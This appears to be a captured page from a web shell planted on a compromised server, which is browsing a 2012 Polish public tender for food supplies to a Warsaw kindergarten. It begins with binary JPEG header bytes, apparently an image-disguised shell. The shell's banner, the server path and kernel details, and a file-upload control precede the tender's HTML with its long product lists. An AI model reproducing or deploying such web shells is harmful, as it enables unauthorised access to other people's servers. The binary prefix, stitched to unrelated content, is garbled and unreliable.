JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121205/491564-N-2012.html

<p class="kh_header"><b>Warszawa: DOSTAWA
ARTYKUŁÓW SPOŻYWCZYCH Z PODZIAŁEM 
NA 5 PAKIETÓW</b><br>
<b>Numer ogłoszenia: 491564 - 2012; data zamieszczenia: 05.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 30 , ul. Rozbrat 10/14, 00-451 Warszawa, woj. mazowieckie, tel. 22 629 38 10, faks 22 629 38 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.p30w-wa.wikom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA
ARTYKUŁÓW SPOŻYWCZYCH Z PODZIAŁEM 
NA 5 PAKIETÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA
ARTYKUŁÓW SPOŻYWCZYCH Z PODZIAŁEM 
NA 5 PAKIETÓW.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-7, 15.50.00.00-3, 15.10.00.00-9, 15.80.00.00-6, 15.98.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.p30w-wa.wikom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PRZEDSZKOLE NR 30
00-451 WARSZAWA, UL. ROZBRAT 10/14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2012 godzina 10:00, miejsce: PRZEDSZKOLE NR 30
00-451 WARSZAWA, UL. ROZBRAT 10/14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb biały baltonowski - na naturalnym zakwasie, masa 650g netto, krojony	Szt.	550
Chleb biały staropolski, krojony, netto 700g	Szt.	750
Chałka, masa netto 300g	Szt.	100
Bułka paryska, krojona, masa netto 300g	Szt.	400
Bułki pszenne, słoneczka, 50g	Szt.	800
Chleb razowy, krojony, masa netto 500g	Szt.	250
Chleb razowy na miodzie	Szt.	100
Chleb typu tost, w folii, masa netto 600g	Szt.	50
Bułeczka z mąki pszennej typu 1850 graham	Szt.	400
Bułka tarta opakowanie 0,5kg	Kg	60
Ciasto piaskowe typu babka, w foremce aluminiowej	Szt.	30
Pączki drożdżowe duże
	Szt.	420
Pączki drożdżowe mini	kg	40
Chleb razowy z ziarnem	Szt.	100
Drożdżówka z jabłkiem	Szt.	350
Drożdżówka z budyniem	Szt.	200
Rogalik francuski	Szt.	40
Jagodzianki	Szt.	210
Strucla	Kg	30
Makowiec	Kg	10
Mini ptysie ze śmietaną	Szt.	240
Sernik z brzoskwiniami	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> JOGURT Z OWOCAMI, KUBEK PROSTOKĄTNY 120G-OWOCE	Szt.	600
Jogurt owocowy-kubek prostokątny 130g, zawierający żywe 	Szt.	500
Jogurt owocowy w okrągłym kubeczku, 125g	Szt.	500
Masło extra o zawartości tłuszczu 82% bez dodatku tłuszczów roślinnych , folia aluminiowa z nadrukiem 200g	Szt.	700
Mleko spożywcze, pasteryzowane, homogenizowane-zaw. tłuszczu 3,2%, folia 1l- w tym ? ilości dotowanego Programu z dopłatami	litr	2000
Ser topiony kremowy - gouda-100g	Szt.	100
Ser żółty, zawartość tłuszczu  45%, sera w serze, dotowany z Programu z dopłatami	kg	50
Śmietanka do ciast i deserów 30%, kartonik, 500ml, składnik dodatkowy: karagen	Szt.	30
Twaróg półtłusty, kl.I, folia 250g, zaw. tłuszczu 3,5%	kg	150
Śmietanka 18% tł, kartonik 500ml,składnik dodatkowy: karagen	Szt.	350
Deser czekoladowy z bitą śmietaną, opakowanie kubek 175g	Szt.	300
Serek twarogowy, śmietankowy, kubek 150g	Szt.	100
Mleko smakowe, kartonik 250ml	Szt.	300
Actimel	Szt.	600
Jogurt naturalny 180g	Szt.	100
Kremowy mix 18%-180g	Szt.	50
Kefir 450g	Szt.	100
Danacol do picia, różne smaki	Szt.	350
Fantasia z owocami, 122g, różne smaki	Szt .	350
Danio 150g, różne smaki	Szt.	500
Activia do picia 195g, różne smaki	Szt.	280.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MIĘSO, WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z indyka, świeży, bez skóry, bez kości	Kg
	60
Kurczak świeży cały, patroszony, 1,5-2kg	Kg	20
Łopatka wieprzowa, bez skóry, bez kości- bez wierzchniej warstwy tłuszczu	Kg	100
Mięso wieprzowe od szynki-bez kości, bez tłuszczu, kawałki wielkości 1-1,5kg	Kg	80
Piersi z kurczaka	Kg	80
Podudzie z kurczaka-pałeczka 10-13dkg	Kg	80
Schab środkowy b/k, o śr. do 10cm	Kg	30
Słonina surowa, bez dodatków, bez skóry, grubość 2-4cm	Kg	10
Szponder wołowy, chudy, surowy, tłuszcz biały, paski do 40 cm,szer. 12cm	Kg	20
Udziec z indyka, b/k	Kg	30
Wątróbka drobiowa z kurczaka	Kg	15
Wołowe b/k-pręga	Kg	30
Wołowe b/k-udziec, kl.I	Kg	30
Korpusy z kurczaka 	Kg	100
Skrzydełka z kurczaka	kg	20
Polędwica wołowa	Kg	30
Rosbeft b/k	Kg	15
Kaczka cała	Kg	10
Skrzydełka z indyka	Kg	30
Wątróbka wp	Kg	15
Żołądki	Kg	10
Kości wędzone	Kg	40
Kiełbasa biała surowa	Kg	40
Kiełbasa biała parzona	Kg	20
Mielonka  Tyrolska	Kg	100
Polędwica sopocka	Kg	100
Kiełbasa krakowska parzona	Kg	80
Kiełbasa szynkowa	Kg	80
Kiełbasa żywiecka	Kg	30
Kiełbasa typu: podwawelska lub toruńśka	Kg	50
Baleron wieprzowy, gotowany, chudy	Kg	30
Salami 	Kg	60
Szynka wieprzowa chuda, soczysta-wędzona lub gotowana	Kg	20
Filet z indyka wędzony	Kg	20
Szynka drobiowa	Kg	70
Ogonówka	Kg	15
Polędwica drobiowa	Kg	30
Parówki delikatesowe	Kg	40
Karczek wiejski pieczony	Kg	20
Pasztet wiejski pieczony, drobiowy, folia	Kg	30
Szynka prasowana  lub konserwowa	Kg	20
Kabanosy	Kg	60
Polędwica łososiowa	Kg	10
Rolada schabowa	Kg	10
Kiełbasa myśliwska	Kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PRODUKTY OGÓLNOSPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jajka o oznaczeniu: 3 - jaja z chowu klatkowego, A-jaj świeże, nie starsze niż 7 dni od daty pakowania, L-duże 63-73g	Szt.	2000
Arbuz-klasa I lub II wg Rozp Komisji (WE) nr 1093/97	kg	50
Banany-klasa I lub II wg Rozp Komisji (WE) nr 2257/94	kg	200
Botwina w pęczkach świeża bez śladów uszk. mech. , pakowana w pęczki	Szt.	50
Brokuły świeże	Szt.	60
Brzoskwinie lub morele świeże	kg	100
Buraki czerwone świeże bez liści	kg	130
Cebula zwyczajna -wielkość średnia	kg	60
Cykoria biała	kg	25
Cytryny	kg	15
Czereśnia	kg	50
Fasolka szparagowa, żółta	kg	30
Fasolka szparagowa, zielona 	kg	30
Grejpfrut	kg	40
Gruszki-soczyste-typu konferencja,klapsa	kg	100
Jabłka-soczyste, słodko-winne, typu cortland,ligol, champion,delikates,rubin,jonagored-średnia wielkość	kg	500
Kalafior świeży	Szt.	50
Kapusta biała-jedna główka o wadze 2-3kg	kg	70
Kapusta czerwona-główka- 2-2,5kg	kg	50
Kapusta kiszona	kg	100
Kapusta pekińska-główka-około 1-1,5kg	kg	30
Kapusta włoska-głowka-3kg	kg	50
Kiwi	Szt.	500
Koperek zielony-pęczki	Szt.	120
Mandarynki bezpestkowe, skórka łatwo odchodząca	kg	160
Marchew	kg	800
Natka pietruszki świeża-pęczki	szt.	200
Nektarynki	szt.	100
Ogórki kwaszone opakowanie wiaderko plastikowe min.3kg	szt.	30
Ogórki małosolne opakowanie plastikowe min. 3kg	szt.	20
Ogórki świeże typu wąż	kg	150
Papryka świeża czerwona	kg	100
Pietruszka-korzeń, świeża bez śladów uszkodzeń mech.	kg	160
Pomarańcza, odmiana Nowelina	kg	80
Pomidor świeży	kg	250
Por czysty świeży	kg	250
Rzodkiew biała	kg	20
Rzodkiew pęczki-czerwona okrągła	Szt.	150
Seler	kg	250
Szczaw świeży	kg	30
Szczypior z małą cebulką-pęczki	szt	100
Szczypiorek-cienki-pęczki	Szt.	200
Śliwki typu węgierka,stanley	kg	300
Truskawka czysta,pakowana w łubiankach po 2000g	kg	50
Winogrona ciemne	kg	100
Wiśnia sokowa	kg	50
Ziemniaki, irga	kg	1800
Por	Szt.	400
Sałata lodowa	Szt.	80
Pieczarka świeża	kg	60
Sałata zielona czysta, nie zgnita	Szt.	30
Pieczarki świeże, czyste pakowane luzem	kg	10
Mintaj-płaty, nie więcej niż 3% glazury technologicznej, karton	kg	250
Makrela wędzona opakowanie folia o poj. 1000g	kg	30
Pasta z łososia, opakowanie tubka o poj. 125g	Szt.	10
Szprotki w oleju, puszka metalowa 180g	kg	30
Tuńczyk w sosie własnym, puszka metalowa 180g	kg	30
Ryba mrożona w kostce, biała	kg	60
Brokuły mrożone, torba foliowa 2500g	kg	80
Brukselka, torba foliowa poj.2500g	kg	30
Czarna porzeczka, torba foliowa 2500g	kg	40
Fasolka szparagowa, żółta cięta, oczyszczona, torba 2500g 	kg	25
Groszek zielony, torba foliowa o poj.2500g	kg	10
Kalafior mrożony różyczki, torba foliowa 2500g	kg	50
Szpinak, torba foliowa o poj.2500g	kg	20
Truskawka, torba foliowa o poj.2500g	kg	50
Wiśnia bez pestki, torba foliowa o poj.2500g	kg	30
Śliwka bez pestki, torba foliowa o poj.2500g	kg	30
Żurawina, torba foliowa o poj.2500g	kg	10
Marcheweczka mini, torba foliowa 2500g	kg	25
Mieszanka warzywna typu barszcz czerwony, folia 0,5kg	kg	20
Warzywa na patelnie, folia o poj. 0,45 kg	kg	25
Mieszanka owocowa, folia o poj.2500g	kg	150
Ananas świeży	Szt	10
Awokado	Szt.	50
Borówka amerykańska, opak.125g	szt	71
Jagoda świeża	Kg	10
Bakłażan	Kg	10
Malina świeża	Kg	10
Kiełki -opak,250g	szt	10
Melon	szt	5
Rabarbar	kg	10
Rukola	kg	5
Bazylia Swieża	szt	5
Imbir	kg	1
Mięta świeża	szt	5
Majeranek świeży	szt	5
Kolendra świeża	szt	5
Pomidorki koktajlowe	kg	10
Ser biały typu feta	szt	10
Ser biały typu mozarella-kulki	szt	40
Zioła prowansalskie suszone	szt	50
Margaryna	szt	50
Oliwa z oliwek	szt	10
Sól ziołowa opakowanie	szt	5
Przyprawa do piernika	szt	20
Czosnek świeży	szt	20
Bazylia suszona-ziele suszone 10g	szt	10
Budyń waniliowy z cukrem, 60g	Szt.	100
Ciastka szkolne opakowanie zbiorcze, 3kg	kg	20
Cukier biały, kryształ, 1kg	kg	450
Cukier waniliowy 16g	szt	40
Czosnek granulowany, 20-25g	szt	20
Drożdże, świeże, 10dkg	szt	10
Dżem truskawkowy, niskosłodzony, wsad owocowy 40g/100g produktu, słoik ok.300g	szt	150
Fasola biała drobna, ok. 400g	kg	10
Groch łuskany, op.400g	kg	10
Herbata owocowa ,op.25szt	szt	25
Herbata zwykła, op.25szt	szt	20
Kawa Inka rozpuszczalna zbożowa, op.150g	szt	40
Kakao ekstra ciemne,200g	szt	50
Kasza gryczana prażona cała, op.0,9kg	kg	50
Kasza jęczmienna perłowa, lamana średnia, op.1kg	kg	30
Kasza kuskus	kg	50
Kasza manna op.1kg	kg	20
Kasza pęczak, op.0,9kg	kg	30
Koncentrat pomidorowy, zawart.ekstraktu 30%, op.słoik 190g	szt	140
Krem do smarowania z orzechami laskowymi, zawart.13%, słoik 350g, 530kcal w 100g produktu	szt	50
Kwas cytrynowy, op 90g	szt	20
Liść laurowy, ziele suche, 6g	szt	40
Majeranek, ziele suche, 8g	szt	40
Majonez dekoracyjny, słoik 400ml	szt	80
Musztarda	szt	20
Makaron nitki, 0,5kg	kg	20
Makaron gniazda, nitki nr 49, op. 0,5kg	kg	30
Makaron kokardki nr 51, op.0,5kg	kg	30
Makaron muszelki nr 26, op. 0,5kg	kg	40
Makaron spaghetti nr 4, op. 0,5kg	kg	30
Makaron świderki nr19, op. 0,5kg	kg	50
Mąka pszenna TYP 480, op.1kg	kg	250
Mąka ziemniaczana, op.1kg	kg	10
Miód naturalny pszczeli, wielokwiatowy, słoik 400g, 319kcal w 100g produktu	szt	80
Olej rafinowany rzepakowy z pierwszego tłoczenia, op.1 litr	szt	180
Papryka słodka, mielona, op.20g	szt	20
Pieprz czarny mielony naturalny, op.20g	szt	30
Płatki do mleka-kwadraciki z pełnego ziarna pszenicy o smaku cynamonowym,op.250g	szt	100
Płatki do mleka, zbożowe kółeczka z miodem, op.250g	szt	100
Płatki do mleka, zbożowe kółeczka o smaku czekoladowym, op.250g	szt	80
Płatki do mleka, zbożowe muszelki o smaku ciemnej i białej czekolady, 250g	szt	80
Płatki kukurydziane do mleka, op.250g	szt	100
Płatki owsiane błyskawiczne, op.400g, 365kcal w 100g produktu	szt	80
Rodzynki sułtańskie, op.100g	szt	40
Rosół z kury, kostka, po 12szt	Szt	100
Rosół wołowy, kostka, po 12szt	szt	50
Ryż biały długoziarnisty, torba papierowa, 1kg, 344kcal w 100g	kg	30
Sok wisniowy zagęszczony, 420ml, butelka szklana, syrop bez konserwantów, pasteryzowany	szt	50
Sól kamienna jodowana, op.1kg	szt	12
Grzyby suszone	kg	5
Soczek jabłkowy ze słomką 200ml	szt	240
Soczek pomarańczowy ze słomką 200ml	szt	140
Kisiel	szt	140
Paluszki rybne, opak. 0,25kg	szt	70
Mieszanka bakaliowa, opak. 0,5kg	kg	2
Baton mleczy Grześ	szt	70
Baton Prinessa	Szt	70
Pestki dyni, opak.100g	szt	5
Pestki słonecznika, opak.100g	szt	5
Ptasie mleczko waniliowe 420g	szt	140
Delicje pomarańczowe 294g	szt	70
Mikołaj czekoladowy duży	szt	70
Czekolada z orzechami, 200g	szt	70
Bombonierka 250g	szt	70
Michałki torebka 385g	szt	70
Czekolada mleczna, 200g	szt	70
Zając wielkanocny czekoladowy	szt	70
Kinder niespodzianka	szt	70
Kalendarz adwentowy 	Szt.	70
Syrop zagęszczony owocowy, 440ml	szt	100
Ziele angielskie, op.	szt	40
Keczup łagodny, plastik 400g	szt	30
Herbata miętowa, 100szt	szt	10
Grzanki ziołowe, 150g	Szt	100
Groszek konserwowy, puszka 400g	szt	120
Kukurydza konserwowa, puszka 400g	szt	50
Groszek ptysiowy, torebka foliowa 400g	szt	30
Krem czekoladowy, słoik szklany	szt	20
Koncentrat burakowy, butelka szklana, 300ml	szt	10
Pasztet drobiowy, puszka 155g	szt	140
Żurek, butelka 1litr	szt	20
Cukier puder, folia 450g	kg	5
Filet z łososia	kg	10
Soki owocowe, karton 1l	szt	210.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
